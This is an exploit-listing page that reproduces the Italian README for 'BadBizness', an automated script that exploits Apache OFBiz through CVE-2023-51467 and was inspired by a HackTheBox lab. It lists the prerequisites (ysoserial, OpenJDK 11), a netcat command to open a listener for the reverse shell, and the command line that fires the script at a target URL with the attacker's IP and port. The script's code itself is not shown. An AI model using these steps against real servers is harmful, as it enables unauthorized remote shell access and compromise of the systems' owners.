Sploitus

Exploit for BadBizness

kitploit · 2026-08-27

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAKEOTTE-BADBIZNESS-CVE-2023-51467
![banner](https://assets.kitploit.com/production/public/readmes/52255/11da7a13f5ee6c22e675687a3cf9d406f5ee9175182907f2aa2e50da1d03fbd7/39372a6807b562fafe8fd4728f0b92f3504ef20ba789292030ca44aaa140e837-display-v1.webp)

# BadBizness

Script di sfruttamento automatico per il framework web Java OF Biz sotto CVE-2023-51467. Ispirato alla macchina HackTheBox Bizness.

## Utilizzo ed Esempio

Questo script richiede lo strumento ysoserial e OpenJDK versione 11. Consulta il menu di utilizzo per l'installazione.

Configura un listener per catturare la shell con il metodo che preferisci. Ecco un esempio con netcat:

root@kitploit:~
    
    
    nc -nlvp 1337
    

Esegui lo script:

root@kitploit:~
    
    
    python3 badbizness.py [percorso a ysoserial-all.jar] [URL BASE DEL TARGET] [IP DEL LISTENER] [PORTA DEL LISTENER]
    
    python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
    

## Dichiarazione di non responsabilità e Crediti

Questo strumento è stato creato come un modo per imparare di più su Python. Ringrazio  script per avermi aiutato a fondo.